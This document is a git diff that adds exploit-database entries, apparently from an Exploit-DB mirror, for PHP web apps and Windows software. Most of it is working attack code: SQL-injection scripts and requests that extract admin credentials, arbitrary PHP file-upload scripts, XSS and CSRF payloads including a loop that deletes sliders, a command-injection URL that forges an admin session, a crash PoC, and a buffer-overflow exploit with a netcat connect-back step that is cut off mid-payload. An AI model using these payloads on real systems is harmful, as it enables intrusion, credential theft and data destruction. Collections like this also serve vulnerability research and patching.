+Bigware Shop versions prior to 2.17 are vulnerable. 
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import httplib2
+import urllib
+import sys
+
+# insert your target link here (with trailing slash)
+url = "http://www.example.com/"
+h = httplib2.Http()
+
+# send sql injection
+headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
+sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
+ former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
+postdata = {  'voteid' : '2', \
+    'pollid' : sqli, \
+    'x' : '1', \
+    'y' : '1', \
+    'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'}
+response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
+print content, "\n", "\n"
+print "If there is an error stating the duplicate admin entry, your shop is vulnerable."
+
diff --git a/platforms/php/webapps/37355.txt b/platforms/php/webapps/37355.txt
new file mode 100755
index 000000000..129bf3e7e
--- /dev/null
+++ b/platforms/php/webapps/37355.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/53814/info
+
+MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+MyBB 1.6.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/forums/member.php?action=profile&uid=[Sqli] 
\ No newline at end of file
diff --git a/platforms/php/webapps/37356.txt b/platforms/php/webapps/37356.txt
new file mode 100755
index 000000000..5f2d8573a
--- /dev/null
+++ b/platforms/php/webapps/37356.txt
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/53850/info
+
+The Email Newsletter plugin for WordPress is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.
+
+An attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
+
+Email Newsletter 8.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=registered_user
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=view_suscriber
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=commentposed _user
+
+http://www.example.com/wordpress/wp-content/plugins/email-newsletter/csv/export.php?option=contact_user 
\ No newline at end of file
diff --git a/platforms/php/webapps/37357.php b/platforms/php/webapps/37357.php
new file mode 100755
index 000000000..5ad6bb71b
--- /dev/null
+++ b/platforms/php/webapps/37357.php
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/53851/info
+
+The VideoWhisper Video Presentation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+VideoWhisper Video Presentation 3.17 is vulnerable; other versions may also be affected.
+
+<?php
+
+$uploadfile="lo.php.gif";
+$ch = 
+curl_init("http://www.example.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+         array('Filedata'=>"@$uploadfile",
+                'room'=>'./'));
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
diff --git a/platforms/php/webapps/37360.txt b/platforms/php/webapps/37360.txt
new file mode 100755
index 000000000..12a6f6ef6
--- /dev/null
+++ b/platforms/php/webapps/37360.txt
@@ -0,0 +1,95 @@
+# Exploit Title:  Persistent XSS
+# Google Dork: intitle: Persistent XSS
+# Date: 2015-06-21
+# Exploit Author:  John Page ( hyp3rlinx )
+# Website: hyp3rlinx.altervista.org
+# Vendor Homepage: genixcms.org
+# Software Link: genixcms.org
+# Version: 0.0.3
+# Tested on: windows 7
+# Category: webapps
+
+
+Vendor:
+=============================================
+genixcms.org
+
+
+
+Product:
+=====================================================
+GeniXCMS v0.0.3 is a PHP based content management system
+
+
+
+Advisory Information:
+===================================================
+Multiple persistent & reflected XSS vulnerabilities
+
+
+
+Vulnerability Details:
+=========================================================
+GeniXCMS v0.0.3 is vulnerable to persistent and reflected XSS 
+
+
+XSS Exploit code(s):
+====================
+
+Persistent XSS:
+-----------------------
+http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&act=add&token=
+
+1-content input field
+content injected XSS will execute after posting is published
+
+2-title input field
+title injected XSS will execute immediate.
+
+
+Relected XSS:
+---------------------
+http://localhost/GeniXCMS-master/GeniXCMS-master/gxadmin/index.php?page=posts&q=1'<script>alert('XSS By Hyp3rlinx')</script>
+
+
+
+Disclosure Timeline:
+=========================================================
+Vendor Notification: NA
+June 21, 2015 : Public Disclosure
+
+
+
+Severity Level:
+=========================================================
+Med
+
+
+
+Description:
+=========================================================
+
+Request Method(s):         [+] GET & POST 
+
+
+Vulnerable Product:        [+] GeniXCMS 0.0.3 
+
+
+Vulnerable Parameter(s):   [+] q, content & title
+                       
+
+Affected Area(s):          [+] index.php
+                                                       
+
+===============================================================
+
+[+] Disclaimer
+Permission is hereby granted for the redistribution of this advisory, provided that
+it is not altered except by reformatting it, and that due credit is given. Permission is
+explicitly given for insertion in vulnerability databases and similar, provided that
+due credit is given to the author. The author is not responsible for any misuse of the
+information contained herein and prohibits any malicious use of all security related
+information or exploits by the author or elsewhere.
+
+
+(hyp3rlinx)
\ No newline at end of file
diff --git a/platforms/php/webapps/37361.txt b/platforms/php/webapps/37361.txt
new file mode 100755
index 000000000..5928e9e1d
--- /dev/null
+++ b/platforms/php/webapps/37361.txt
@@ -0,0 +1,278 @@
+# Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion
+# Date: 2015-06-23
+# Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/"
+# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
+# Software Link: https://downloads.wordpress.org/plugin/slider-image.latest-stable.zip
+# Version: 2.7.5 
+# Tested on: windows 7 ultimate + Firefox.
+# video demo: https://www.youtube.com/watch?v=RTLAbmyBIU8
+
+====================================================
+    * CSRF + Persistent JS/HTML Injection 
+====================================================
+
+=====================
+DECRIPTION
+=====================
+
+An attacker can make a user with access privileges to a page containing malicious script
+and send some parameters injected JavaScript to the database.
+
+============================
+vulnerable POST parameters
+============================
+//variables with variation names//
+
+order_by_[variation_number]
+titleimage[variation_number]
+sl_url[variation_number]
+sl_link_target[variation_number]
+im_description[variation_number]
+imagess[variation_number]
+
+//variables with constant names//
+
+sl_pausetime
+sl_changespeed
+
+===============
+EXPLOTATION
+===============
+
+variable numbers can be extracted from a published page containing the slider. and make all
+parameters injected with code JS / HTML.
+
+-------------------
+EXAMPLE
+-------------------
+[Extracting data for use]
+
+In a vulnerable site and has posted a slider, the malicious user can extract information
+the attack is successful.
+
+-----------------------------------------------------------------------------------------
+[variation_number] is a variable number that could be extracted as follows.
+-----------------------------------------------------------------------------------------
+The attacker sees the following framento source code of the page with slider:
+
+<!-- ##########################DOTS######################### -->
+
+   <div class="huge_it_slideshow_dots_container_2"> [ <---SLIDER_ID_FOUND=2 ]
+  <div class="huge_it_slideshow_dots_thumbnails_2">
+        <div id="huge_it_dots_0_1" class="huge_it_slideshow_dots_1 huge_it_slideshow_dots_active_1" 
+onclick="huge_it_change_image_1(parseInt(jQuery('#huge_it_current_image_key_1').val()), '0', data_1,false,true);
+return false;" 
+
+image_id="14" [ <---ITS_VARIATION_NUMBER!!!  ]
+
+image_key="0"></div>
+          </div>
+    <a id="huge_it_slideshow_left_1" href="#" >
+<div id="huge_it_slideshow_left-ico_1">
+<div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div>
+        </a>
+    <a id="huge_it_slideshow_right_1" href="#" >
+        <div id="huge_it_slideshow_right-ico_1 , data_1">
+        <div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div>
+    </a>
+        </div>
+<!-- ##########################IMAGES######################### -->
+
+
+-----------------------------------------------------------------------------------
+Classes tags [<div>] have a number at the end that is the id of the slider.
+Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the
+POST variable number of vulnerable parameters.
+
+============================================
+POC [DATA RELATING TO THE ABOVE]
+============================================
+------------                                                            SLIDER_ID
+URL REQUEST                                                                  |                                      
+------------
+http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply
+--------
+POSTDATA
+--------
+name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=&
+titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
+sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=&
+sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
+sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&
+im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E&
+imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500&
+sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task=
+
+--------------------
+RESPONSE ADMIN PAGE
+--------------------
+
+...
+
+<input class="order_by" type="hidden" name="order_by_14" value="0" />
+<div class="image-container">
+    <img src="" onmouseover=alert(/i0akiN_hack/) a="" />
+    <div>
+        <script>
+            ...        </script>
+        <input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" />
+        <span class="wp-media-buttons-icon"></span>
+        <div class="huge-it-editnewuploader uploader button14 add-new-image">
+            <input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" />
+        </div>
+    </div>
+</div>
+<div class="image-options">
+    <div>
+        <label for="titleimage14">Title:</label>
+        <input  class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14"  value="" onmouseover=alert(/i0akiN_hack/) a="">
+    </div>
+    <div class="description-block">
+        <label for="im_description14">Description:</label>
+        <textarea id="im_description14" name="im_description14" >as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>&lt;/textarea&gt;
+    </div>
+    <div class="link-block">
+        <label for="sl_url14">URL:</label>
+        <input class="text_area url-input" type="text" id="sl_url14" name="sl_url14"  value="" onmouseover=alert(/i0akiN_hack/) a="" >
+        <label class="long" for="sl_link_target14">Open in new tab</label>
+        <input type="hidden" name="sl_link_target14" value="" />
+        <input    class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" />
+    </div>
+    <div class="remove-image-container">
+        <a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a>
+    </div>
+</div>
+
+<div class="clear"></div>
+</li>
+</ul>
+</div>
+</div>
+<div id="postbox-container-1" class="postbox-container">
+    <div id="side-sortables" class="meta-box-sortables ui-sortable">
+        <div id="slider-unique-options" class="postbox">
+            ...
+            <li>
+                <label for="sl_pausetime">Pause time</label>
+                <input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
+            </li>
+            <li>
+                <label for="sl_changespeed">Change speed</label>
+                <input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" />
+            </li>
+
+            ...
+
+-----------------------------------------
+RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
+-----------------------------------------
+
+...
+
+<script>
+    var data_2 = [];
+    var event_stack_2 = [];
+    video_is_playing_2 = false;
+    data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
+<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";    
+
+===<!-- SUCCESFULL INJECTION :) -->===
+
+var huge_it_trans_in_progress_2 = false;
+var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
+var huge_it_playInterval_2;
+// Stop autoplay.
+window.clearInterval(huge_it_playInterval_2);
+....
+
+<!-- ##########################IMAGES######################### -->
+<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">        
+    <div class="huge_it_slide_container_2">
+        <div class="huge_it_slide_bg_2">
+            <ul class="huge_it_slider_2">
+                <li class="huge_it_slideshow_image_item_2" id="image_id_2_0">      
+<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" 
+src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
+                    </a>        
+                    <div class="huge_it_slideshow_title_text_2 ">         " onmouseover=alert(/i0akiN_hack/) a="</div>
+                    <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>                        </div>
+                </li>
+                <input  type="hidden" id="huge_it_current_image_key_2" value="0" />
+            </ul>
+        </div>
+    </div>
+</div>
+
+...
+
+
+
+-----------------------------------------
+RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER
+-----------------------------------------
+
+...
+
+<script>
+    var data_2 = [];
+    var event_stack_2 = [];
+    video_is_playing_2 = false;
+    data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt;
+<script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='";    
+
+===<!-- SUCCESFULL INJECTION :) -->===
+
+var huge_it_trans_in_progress_2 = false;
+var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a=";
+var huge_it_playInterval_2;
+// Stop autoplay.
+window.clearInterval(huge_it_playInterval_2);
+....
+
+<!-- ##########################IMAGES######################### -->
+<div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2">        
+    <div class="huge_it_slide_container_2">
+        <div class="huge_it_slide_bg_2">
+            <ul class="huge_it_slider_2">
+                <li class="huge_it_slideshow_image_item_2" id="image_id_2_0">      
+<a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" 
+src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" />
+                    </a>        
+                    <div class="huge_it_slideshow_title_text_2 ">         " onmouseover=alert(/i0akiN_hack/) a="</div>
+                    <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>                        </div>
+                </li>
+                <input  type="hidden" id="huge_it_current_image_key_2" value="0" />
+            </ul>
+        </div>
+    </div>
+</div>
+
+...
+
+
+====================================
+ * CSRF & ARBITRARY SLIDER DELETION
+====================================
+
+=====================
+ POC
+=====================
+
+//delete first 100 sliders
+
+<script> 
+
+function sendData( id_slider ){ 
+   var req=new XMLHttpRequest();
+   req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true);
+   req.withCredentials="true";
+   req.send();      
+}
+
+for(var i=0;i<100;i++){
+     sendData( i );
+}
+
+</script>
+
+token authentication not found!
\ No newline at end of file
diff --git a/platforms/php/webapps/37363.txt b/platforms/php/webapps/37363.txt
new file mode 100755
index 000000000..cd53ab2c4
--- /dev/null
+++ b/platforms/php/webapps/37363.txt
@@ -0,0 +1,100 @@
+# Exploit Title: Genixcms register.php multiple SQL vuln
+# Date: 2015-06-23
+# Exploit Author: cfreer (poc-lab)
+# Vendor Homepage:  http://www.genixcms.org
+# Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip
+# Version: 0.0.3
+# Tested on: Apache/2.4.7 (Win32) 
+# CVE : CVE-2015-3933
+
+
+=====================
+SOFTWARE DESCRIPTION
+=====================
+
+Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS.
+
+=============================
+VULNERABILITY: SQL Injection
+=============================
+
+
+
+Poc：
+
+1、Genixcms register.php email SQL vuln
+
+HTTP Data Stream
+
+POST /genixcms/register.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+
+email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer&register=1&token=&userid=poc-lab
+
+
+
+
+\inc\lib\User.class.php
+
+
+public static function is_email($vars){
+    if(isset($_GET['act']) && $_GET['act'] == 'edit'){
+        $where = "AND `id` != '{$_GET['id']}' ";
+    }else{
+        $where = '';
+    }
+    $e = Db::result("SELECT * FROM `user` WHERE `email` = '{$vars}' {$where}");
+    if(Db::$num_rows > 0){
+        return false;
+    }else{
+        return true;
+    }
+}
+
+
+
+==============================================================================================================================================
+2、Genixcms register.php userid SQL vuln
+
+HTTP Data Stream
+
+POST /genixcms/register.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 224
+
+
+email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org&register=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
+
+
+\inc\lib\User.class.php
+
+public static function is_exist($user) {
+if(isset($_GET['act']) && $_GET['act'] == 'edit'){
+    $where = "AND `id` != '{$_GET['id']}' ";
+    }else{
+        $where = '';
+    }
+    $usr = Db::result("SELECT `userid` FROM `user` WHERE `userid` = '{$user}' {$where} ");
+    $n = Db::$num_rows;
+    if($n > 0 ){
+        return false;
+    }else{
+        return true;
+    }
+
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/37364.txt b/platforms/php/webapps/37364.txt
new file mode 100755
index 000000000..430cfe79e
--- /dev/null
+++ b/platforms/php/webapps/37364.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
+# Google Dork: inurl:option=com_simpleimageupload
+# Date: 23.06.2015
+# Exploit Author: CrashBandicot @DosPerl
+# Vendor Homepage: http://tuts4you.de/
+# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
+# Version: 1.0
+# Tested on: MsWin32
+
+# Vuln Same to Com_Media Vulnerability
+
+# Live Request :
+
+POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
+
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=---------------------------247062787817068
+
+
+-----------------------------247062787817068\r\n
+Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n
+Content-Type: application/x-php\r\n
+\r\n
+0wn3d ! ;)\r\n
+-----------------------------247062787817068\r\n
+Content-Disposition: form-data; name="return-url"\r\n
+\r\n
+aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
+-----------------------------247062787817068--\r\n
+
+
+# Exploit :
+
+<?php 
+
+echo '<form action="#"  method="post" enctype="multipart/form-data">
+<input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
+</form>';
+
+
+if($_POST) { 
+	
+	$target = $_POST['target'];
+
+$file = "0wn3d ! ;)"; 
+$header = array("Content-Type: application/x-php",
+"Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\"");
+
+$ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
+curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); 
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+
+} else { die(); }
+?>
+
+
+# Path of File : 127.0.0.1/images/[Rand0mString]L0v3.php
+# Sh00t to Mr_AnarShi-T;
\ No newline at end of file
diff --git a/platforms/php/webapps/37369.txt b/platforms/php/webapps/37369.txt
new file mode 100755
index 000000000..431e25a68
--- /dev/null
+++ b/platforms/php/webapps/37369.txt
@@ -0,0 +1,60 @@
+Advisory ID: HTB23261
+Product: Vesta Control Panel
+Vendor: http://vestacp.com
+Vulnerable Version(s): 0.9.8 and probably prior
+Tested Version: 0.9.8
+Advisory Publication:  May 20, 2015  [without technical details]
+Vendor Notification: May 20, 2015 
+Vendor Patch: June 3, 2015 
+Public Disclosure: June 17, 2015 
+Vulnerability Type: OS Command Injection [CWE-78]
+CVE Reference: CVE-2015-4117
+Risk Level: Critical 
+CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered critical vulnerability in Vesta Control Panel, which can be exploited to execute arbitrary system commands and gain complete access to the vulnerable system.
+
+The vulnerability exists due to insufficient filtration of user-input passed via the "backup" HTTP GET parametre to "/list/backup/index.php" before using it in the PHP 'exec()' function. A remote authenticated attacker can inject arbitrary commands and execute them on the system with privileges of the default Vesta Control Panel "admin" account. 
+
+Successful exploitation of this vulnerability may allow an attacker to gain complete control over the Vesta Control Panel and use it to advance his privileges on the system, manage installed services, reconfigure firewall, etc. Since Vesta Control Panel is a multiuser control panel for hosting multiple websites, any registered client can use the described vulnerability to compromise the entire system.
+
+A simple exploit below will create a PHP session file in "/tmp/" directory with administrative access to Vesta Control Panel:
+
+https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20  echo 'V0VCX1NZU1RFTXxzOjc6ImFwYWNoZTIiO1dFQl9SR1JPVVBTfHM6ODoid3d3LWRhdGEiO1dFQl9QT1JUfHM6NDoiODA4MCI7V0VCX1NTTHxzOjc6Im1vZF9zc2wiO1dFQl9TU0xfUE9SVHxzOjQ6Ijg0NDMiO1BST1hZX1NZU1RFTXxzOjU6Im5naW54IjtQUk9YWV9QT1JUfHM6MjoiODAiO1BST1hZX1NTTF9QT1JUfHM6MzoiNDQzIjtGVFBfU1lTVEVNfHM6NjoidnNmdHBkIjtNQUlMX1NZU1RFTXxzOjU6ImV4aW00IjtJTUFQX1NZU1RFTXxzOjc6ImRvdmVjb3QiO0FOVElWSVJVU19TWVNURU18czowOiIiO0FOVElTUEFNX1NZU1RFTXxzOjA6IiI7REJfU1lTVEVNfHM6NToibXlzcWwiO0ROU19TWVNURU18czo1OiJiaW5kOSI7U1RBVFNfU1lTVEVNfHM6MTc6IndlYmFsaXplcixhd3N0YXRzIjtCQUNLVVBfU1lTVEVNfHM6NToibG9jYWwiO0NST05fU1lTVEVNfHM6NDoiY3JvbiI7RElTS19RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU18czo4OiJpcHRhYmxlcyI7RklSRVdBTExfRVhURU5TSU9OfHM6ODoiZmFpbDJiYW4iO1JFUE9TSVRPUll8czo1OiJjbW1udCI7VkVSU0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsYW5ndWFnZXxzOjI6ImVuIjt1c2VyfHM6NToiYWRtaW4iO2JhY2t8czoxMToiL2xpc3QvdXNlci8iOw==' | base64 --decode > /tmp/sess_12345%20||%20echo%20\
+  
+After successful creation of PHP session file, the following cookie can be used to gain administrative access:
+ 
+ 
+GET / HTTP/1.1
+Cookie: mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D; PHPSESSID=12345
+
+
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to Vesta Control Panel 0.9.8-14
+
+More Information:
+http://vestacp.com/roadmap/#history
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23261 - https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta Control Panel.
+[2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control panel with premium features, secure, advanced and minimalistic design
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
\ No newline at end of file
diff --git a/platforms/windows/dos/37343.py b/platforms/windows/dos/37343.py
new file mode 100755
index 000000000..136027ff4
--- /dev/null
+++ b/platforms/windows/dos/37343.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python
+
+
+# Exploit Title: Crash PoC Seagate Dashboard 4.0.21.0
+# Date: 2015-06-20
+# Exploit Author: HexTitan
+# Vendor Homepage: http://www.seagate.com/
+# Software Link: http://www.seagate.com/support/downloads/item/seagate-dashboard-windows-master-dl/
+# Version: 4.0.21.0
+# Tested on: Windows 8.1 32bit
+#
+#Description:
+#
+#The dasboard tool is part of the Seagate software solution for storage. The Dashboard.exe process opens a random port in the 5000-6000 range on each launch.
+#
+#PoC:
+#
+#The attached Python script will send 3100 A's to the target port. This will cause a crash in the Dashboard.exe process.
+#
+#
+#Solution:
+#
+#Until a fix is available, firewall the Dashboard.exe process.
+
+import socket
+import sys
+import os
+ 
+target = '[ip]'
+port = [port]
+
+buffer = 'A'*3100
+
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+	connect = s.connect((target, port))
+	print '[*] Connected to ' + target
+
+except:
+	print '[-] Unable to connect to ' + target
+	sys.exit(0)
+
+s.send(buffer)
+
+
+print '[!] Malformed request sent\n'
+s.close()
diff --git a/platforms/windows/local/37344.py b/platforms/windows/local/37344.py
new file mode 100755
index 000000000..0b86a6496
--- /dev/null
+++ b/platforms/windows/local/37344.py
@@ -0,0 +1,103 @@
+#!/usr/bin/python
+#
+# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
+#
+# Author: Naser Farhadi
+#
+# Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit)
+#
+# Usage:
+#       chmod +x KMPlayer.py
+#       python KMPlayer.py
+#       Alt+c | Video Capture | Alt+a | Audio Capture
+#		paste content of KMPlayer.txt into Filename
+#       nc 172.20.10.14 333
+#
+# Video: http://youtu.be/9gtZxR2ioTM
+##
+
+buffer = (
+            "\x50"  # PUSH EAX
+            "\x40"  # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
+            "\x5c"  # POP ESP
